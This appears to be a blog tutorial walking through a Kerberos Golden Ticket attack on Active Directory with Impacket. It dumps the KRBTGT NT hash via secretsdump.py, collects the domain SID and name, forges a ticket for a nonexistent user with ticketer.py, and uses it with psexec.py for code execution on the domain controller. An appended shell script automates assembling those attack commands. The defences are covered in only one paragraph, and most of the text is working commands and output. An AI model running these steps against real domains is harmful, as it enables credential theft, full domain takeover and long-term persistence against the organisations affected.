Golden Ticket With Impacket
In a Golden Ticket attack, an attacker forges a Kerberos Ticket Granting Ticket (TGT) for the domain. The forged ticket is encrypted and signed with the key of the KRBTGT account, the same key the domain controller uses for legitimate TGTs, so the KDC accepts it and hands out service tickets for whatever user and group memberships the attacker wrote into it. It is called a "Golden Ticket" because it effectively gives the attacker unrestricted access to the domain: any user, any group (Domain Admins included), and a lifetime of the attacker's choosing.
The Golden Ticket attack is a serious threat because the attacker does not need the password of the account they impersonate, the account does not even have to exist, and the ticket keeps working until the KRBTGT password is changed (twice, so the previous key is no longer honoured). Strong passwords and two-factor authentication on user accounts do not stop it, since the ticket bypasses authentication altogether. What does help is keeping the KRBTGT secret out of reach (treating domain controllers and their backups as Tier 0 and restricting who can replicate directory secrets), resetting the KRBTGT password after any suspected domain compromise, and alerting on TGTs issued for accounts that do not exist or with unusually long lifetimes.
I wanted to know how to create a Golden Ticket, and in my pursuit to find an answer I came across many ways to do this. I found most techniques used several tools and took more work than I'd prefer. After all, I am a developer for a reason: I'm lazy! Here I will attempt to show how I do it the easy way using Impacket.
Prerequisites
- Impacket
- Windows Active Directory Domain Controller
The attack abuses how Kerberos authentication works in Active Directory, so a domain controller is needed for it to work. You also need credentials that can read the KRBTGT account's secret from that domain controller (in the examples below, a domain administrator account), which is why a Golden Ticket is a persistence technique rather than an initial foothold.
Impacket
Creating a Golden Ticket is made simple with Impacket. Impacket is a collection of Python classes for working with network protocols (SMB, MSRPC, Kerberos, LDAP and more) that ships with a set of example scripts, and any hacker should familiarize herself/himself with it. The easiest way to get started with Impacket is to create a docker image. For more information on that check out my blog post impacket and docker.
For creating a Golden Ticket we are only concerned with the following tools.
- secretsdump.py
- lookupsid.py
- ticketer.py
- psexec.py
Create a Golden Ticket
To create a Golden Ticket two pieces of information are needed: the NT hash of the KRBTGT account (ticketer.py can also take the account's AES key via -aeskey) and the domain SID. ticketer.py also needs the DNS name of the domain, so that is collected as well.
All of this can be done with Impacket.
KRBTGT NT Hash
Let's start with the KRBTGT hash. secretsdump.py pulls the domain's secrets from the domain controller over the same replication interface (DRSUAPI) that domain controllers use among themselves, and prints them as user:rid:lmhash:nthash:::. The pipeline below keeps only the krbtgt NTLM line (the Kerberos-key lines for the same account do not contain ':::') and writes it to a file called win2016 in the ~/ directory.
secretsdump.py Administrator:vagrant@192.168.64.133 | grep krbtgt | grep ::: > ~/win2016; cat ~/win2016
Domain SID
To get the domain SID use lookupsid.py, which enumerates SIDs over MSRPC, and grep the "Domain SID" line out of its output. This is the SID of the domain itself (S-1-5-21-x-y-z), not a user or group SID with a RID appended; ticketer.py builds the user's SID from it.
Again that information is appended to the win2016 file.
lookupsid.py Administrator:vagrant@192.168.64.133 | grep "Domain SID" >> ~/win2016; cat ~/win2016
Domain Name
It is easy to lose track of which domain we are on, and ticketer.py needs the DNS domain name (the Kerberos realm) exactly right. To limit errors we will not assume the domain name but read it from the machine: the Domain property of Win32_ComputerSystem holds the DNS name of the computer's domain.
echo "powershell Get-WmiObject Win32_ComputerSystem" > ~/GetDomain.bat
Now execute this bat file on the target. psexec.py -c uploads the file and runs it; grep keeps only the Domain line of the output.
psexec.py Administrator:vagrant@192.168.64.133 -c ~/GetDomain.bat | grep Domain >> ~/win2016; cat ~/win2016
Create Ticket
With all the necessary data, create the ticket. The last argument is the user name to forge; it does not have to exist in the domain. By default ticketer.py gives the ticket the RID of the built-in Administrator (500), membership of the privileged default groups (Domain Admins among them) and a ten-year lifetime; -user-id, -groups and -duration override those defaults.
ticketer.py -nthash 4031b5ae4b9defa1f411f26610493e0c -domain-sid S-1-5-21-126282473-2140987555-3925513934 -domain Win2016.local baduser
Impacket v0.9.17-dev - Copyright 2002-2018 Core Security Technologies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for Win2016.local/baduser
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in baduser.ccache
Use the Ticket
Impacket scripts that take -k read the Kerberos credential cache named by the KRB5CCNAME environment variable, so to use the ticket with psexec.py that variable has to point at the .ccache file ticketer.py wrote.
Export the Ticket
Here the variable is added to ~/.bashrc so it survives new shells. The path below is where the ccache ended up on this box (a vagrant share); adjust it to wherever baduser.ccache was saved.
echo "export KRB5CCNAME=/vagrant/docs/baduser.ccache" >> ~/.bashrc
. ~/.bashrc
tail ~/.bashrc
Use the Ticket With Psexec
Below we use the ticket against Win2016, the domain controller itself. Two details matter: -no-pass -k tells psexec.py to authenticate with the ticket in KRB5CCNAME instead of a password, and the target is given as a host name (Win2016.Win2016.local) rather than an IP, because the service ticket is requested for the SPN cifs/<host name>; -target-ip supplies the address to actually connect to.
export KRB5CCNAME=/vagrant/docs/baduser.ccache; psexec.py -dc-ip 192.168.64.133 -target-ip 192.168.64.133 -no-pass -k Win2016.local/baduser@Win2016.Win2016.local
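The steps above collect three values into one file and then type them into ticketer.py and psexec.py by hand. The script below is an added example, not code from the original post or from Impacket: it parses a win2016-style file, checks that each value looks right (32 hex characters for the hash, a real domain SID rather than a user SID, no stray carriage return on the domain name relayed from the Windows console), refuses an IP literal as the -k target, and prints the two command lines. The file contents are constructed here from the placeholder values shown on the page so the script runs offline; nothing in it talks to a domain controller.

```shell
#!/bin/sh
# Added example (not from the original post or Impacket): pull the values
# ticketer.py needs out of a win2016-style collection file, sanity-check them
# and assemble the ticketer.py / psexec.py command lines from the page.
# All sample data is constructed; hash, SID and names are the page's placeholders.

CR=$(printf '\r')
# Constructed stand-in for ~/win2016. The last line carries a trailing CR
# because psexec.py relays the Windows console output unchanged.
WIN2016_SAMPLE="krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4031b5ae4b9defa1f411f26610493e0c:::
[*] Domain SID is: S-1-5-21-126282473-2140987555-3925513934
Domain              : Win2016.local$CR"

# secretsdump.py prints NTDS secrets as user:rid:lmhash:nthash::: ; take field 4
# of the krbtgt line (with or without a DOMAIN\ prefix). Kerberos-key lines for
# the same account have no numeric RID in field 2 and are skipped.
krbtgt_nthash() {
  printf '%s\n' "$1" | tr -d '\r' |
    awk -F: '($1 == "krbtgt" || $1 ~ /\\krbtgt$/) && $2 ~ /^[0-9]+$/ && NF >= 7 { print $4; exit }'
}

# lookupsid.py prints "[*] Domain SID is: S-1-5-21-..."; keep only the SID.
domain_sid() {
  printf '%s\n' "$1" | tr -d '\r' |
    sed -n 's/.*Domain SID is: *\(S-1-5-21-[0-9-]*\).*/\1/p' | head -n 1
}

# Get-WmiObject Win32_ComputerSystem prints "Domain : <dns domain>". The CR must
# go, or ticketer.py would be handed "Win2016.local\r" as the realm.
domain_name() {
  printf '%s\n' "$1" | tr -d '\r' |
    sed -n 's/^Domain[[:space:]]*:[[:space:]]*\([^[:space:]]*\).*/\1/p' | head -n 1
}

is_nthash()     { printf '%s' "$1" | grep -Eq '^[0-9a-fA-F]{32}$'; }
# A domain SID has exactly three sub-authorities after S-1-5-21; a user or group
# SID carries a fourth (the RID) and must not be passed as -domain-sid.
is_domain_sid() { printf '%s' "$1" | grep -Eq '^S-1-5-21-[0-9]+-[0-9]+-[0-9]+$'; }
is_ipv4()       { printf '%s' "$1" | grep -Eq '^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$'; }

# Build the ticketer.py command. $1 = file contents, $2 = name to forge (it need
# not exist in the domain). Fails without output if any input is malformed.
ticketer_cmd() {
  tc_hash=$(krbtgt_nthash "$1"); tc_sid=$(domain_sid "$1"); tc_dom=$(domain_name "$1")
  is_nthash "$tc_hash"    || { echo "krbtgt NT hash missing or not 32 hex chars" >&2; return 1; }
  is_domain_sid "$tc_sid" || { echo "domain SID missing or not a domain SID" >&2; return 1; }
  [ -n "$tc_dom" ]        || { echo "domain name missing" >&2; return 1; }
  printf 'ticketer.py -nthash %s -domain-sid %s -domain %s %s\n' "$tc_hash" "$tc_sid" "$tc_dom" "$2"
}

# Build the psexec.py command. $1 = ccache path, $2 = DC IP, $3 = domain,
# $4 = forged user, $5 = target host name. With -k, psexec.py requests a service
# ticket for cifs/<target>, so the target must be a name the KDC knows, not an
# IP literal; -target-ip carries the address to connect to.
psexec_cmd() {
  if is_ipv4 "$5"; then
    echo "target must be a host name, not $5: no SPN matches an IP literal; pass the address with -target-ip" >&2
    return 1
  fi
  printf 'KRB5CCNAME=%s psexec.py -dc-ip %s -target-ip %s -no-pass -k %s/%s@%s\n' \
    "$1" "$2" "$2" "$3" "$4" "$5"
}

# Demo run on the constructed file.
ticketer_cmd "$WIN2016_SAMPLE" baduser
psexec_cmd /vagrant/docs/baduser.ccache 192.168.64.133 Win2016.local baduser Win2016.Win2016.local
```

Run it as-is to see the two command lines reproduced from the sample; replace WIN2016_SAMPLE with `$(cat ~/win2016)` to build them from a real collection file. The checks are cheap insurance against the two mistakes that cost the most time in practice: a realm with an invisible carriage return, and a -k target written as an IP.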